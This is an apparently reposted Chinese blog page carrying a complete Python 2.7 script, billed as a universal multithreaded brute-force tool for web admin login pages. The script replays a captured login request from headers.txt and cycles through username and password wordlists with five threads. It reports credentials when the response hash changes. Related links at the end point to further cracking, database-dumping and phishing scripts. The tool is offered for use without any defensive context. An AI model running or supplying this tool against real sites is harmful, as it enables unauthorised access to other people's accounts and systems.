python版通用后台账号密码多线程爆破必杀器
来源:互联网 发布:企业局域网监控软件 编辑:程序博客网 时间:2024/06/05 02:26
#! /usr/bin/env python2.7#coding=utf-8#通用后台账号密码多线程爆破必杀器import reimport osimport sysimport gzipimport Queueimport getoptimport msvcrtimport urllibimport httplibimport hashlibimport urllib2import StringIOimport threadingclass hackcrack(threading.Thread): def __init__(self,ooldmd5,uuu,ppp): threading.Thread.__init__(self) self.ooldmd5 = ooldmd5 self.uuu = uuu self.ppp = ppp def run(self): while 1: if queue.empty() == True: break self.crack(self.ooldmd5,self.uuu,self.ppp) def crack(self,ooldmd5,uuu,ppp): data = queue.get() pathes = path() headerses = headers() arg = host() m = re.compile('%s=(.*?)&' % uuu) n = re.compile('%s=(.*?)&' % ppp) us = m.findall(data) pw = n.findall(data) conn = httplib.HTTPConnection(arg) try: conn.request('POST',pathes,data,headerses) httpres = conn.getresponse() if ('content-encoding', 'gzip') in httpres.getheaders(): compressedstream = StringIO.StringIO(httpres.read()) gzipper = gzip.GzipFile(fileobj=compressedstream) ccode = gzipper.read() else: ccode = httpres.read() if ccode: newmd5 = hashlib.md5(ccode).hexdigest() else: newmd5 = hashlib.md5('mdbhack').hexdigest() if ooldmd5 != newmd5: print '\n<info> http://%s' % arg print '<info> http://%s%s' % (arg,pathes) print '<info> I Find It -------->username:%s password:%s<--------' % (us[0],pw[0]) print ccode os._exit(1) else: print '[%s] hacking -------->username:%s password:%s' % (queue.qsize(),us[0],pw[0]) #print ccode except: pass class ThreadGetKey(threading.Thread): def run(self): try: chr = msvcrt.getch() if chr == 'q': print "stopped by your action ( q )" os._exit(1) except: os._exit(1)def info(): print ''' ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. `+---------------------------^----------| `\_,-------, ___@ mdbhack#QQ.com______| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( For example: `------' crack.py -u username -p password '''def path(): f = open('headers.txt','r') for p in f: if 'POST' in p: path = p.split(' ')[1].strip() #print path return pathdef headers(): headers = {} hheader = ['Host','User-Agent','Accept','Accept-Language','Accept-Encoding','Referer','Cookie','Connection','Content-Type'] f = open('headers.txt','r') for p in f: for hh in hheader: if hh in p: headers[hh] = p.split(':',1)[1].strip() return headersdef host(): f = open('headers.txt','r') for p in f: if 'Host' in p: arg = p.split(':')[1].strip() #print arg return argdef testcrack(username,password): pathes = path() arg = host() headerses = headers() getusername = username getpassword = password f = open('headers.txt','r') for xxx in f: if '&' in xxx and '=' in xxx: getdata = xxx.strip() getpw = re.compile('%s=(.*?)&' % password) getusern = re.compile('%s=(.*?)&' % username) bb = getpw.sub('%s=%s&' % (password,'mdbhackcom'),getdata) data = getusern.sub('%s=%s&' % (username,'mdbhack'),bb) conn = httplib.HTTPConnection(arg) conn.request('POST',pathes,data,headerses) httpres = conn.getresponse() if ('content-encoding', 'gzip') in httpres.getheaders(): compressedstream = StringIO.StringIO(httpres.read()) gzipper = gzip.GzipFile(fileobj=compressedstream) code = gzipper.read() else: code = httpres.read() if code: oldmd5 = hashlib.md5(code).hexdigest() else: oldmd5 = hashlib.md5('mdbhack').hexdigest() return oldmd5 def crack(username,password): global queue,ooldmd5 threads = [] line = 5 queue = Queue.Queue() pathes = path() arg = host() ooldmd5 = testcrack(username,password) headerses = headers() f = open('headers.txt','r') for xxx in f: if '&' in xxx and '=' in xxx: getdata = xxx.strip() for us in open('username.txt','r'): print '<info> Scan Username is %s ' % us.strip() for pw in open('password.txt','r'): getpw = re.compile('%s=(.*?)&' % password) getusern = re.compile('%s=(.*?)&' % username) bb = getpw.sub('%s=%s&' % (password.strip(),urllib2.quote(pw.strip())),getdata) data = getusern.sub('%s=%s&' % (username,urllib2.quote(us.strip())),bb) queue.put(data) shouhu = ThreadGetKey() shouhu.setDaemon(True) shouhu.start() for x in range(line): y = hackcrack(ooldmd5,username,password) y.start() threads.append(y) for x in threads: x.join() if __name__ == '__main__': if len(sys.argv) == 5: f = open('headers.txt','r') for xxx in f: if '&' in xxx and '=' in xxx: getdata = xxx.strip() try: opts, args = getopt.getopt (sys.argv[1:], "u:p:")#Assigning Parameters except: info() sys.exit(1) for opt,arg in opts:#Traversal if opt == '-u': if arg.strip() in getdata: username = arg.strip() else: print '\nusername table %s is Wrong' % arg.strip() username = '' elif opt == '-p': if arg.strip() in getdata: password = arg.strip() else: print 'password table %s is Wrong' % arg.strip() password = '' else: info() sys.exit(1) if username and password: crack(username,password) else: sys.exit(1) else: info() sys.exit(1)
0 0
- python版通用后台账号密码多线程爆破必杀器
- Python MySQL批量爆破工具多线程版
- 中国移动CMCC-EDU无线账号密码爆破
- Python在线爆破邮箱账号密码测试代码(亲测可用)
- CTF writeup:python脚本爆破zip密码
- 使用python对登录密码爆破
- zblogphp后台账号密码重置
- 爆破密码
- 密码爆破
- python多线程ssh爆破与防范
- 超简单利用burpsuite爆破wordpress后台密码
- Python3 实现网站后台弱口令爆破(多线程)
- ASP通用账号密码记录(更新版)
- burp密码爆破(初学者粗略版)
- python 写的http后台弱口令爆破工具
- 万能”的网站后台账号和密码!
- 重置DedeCMS后台管理员admin账号密码
- Python绝技笔记--------Zip压缩文件密码爆破小脚本
- 【JS】【客户端】window对象
- linux 查找字符串的命令
- mssql脱裤脚本 --支持千万级别
- android 在一个APP中通过包名或类名启动另一个APP
- PHP 基础认证钓鱼脚本
- python版通用后台账号密码多线程爆破必杀器
- 算法
- php版的iisspy
- 批量域名转IP脚本[修改版]
- android 在webapp中判断native app是否安装并直接打开
- Ubuntu安装界面下方无法显示问题,导致无法操作解决办法
- 2014北京赛区现场赛B hdu 5113 Black And White
- android 从网页中跳转到APP
- 算法导论---------------散列表(hash table)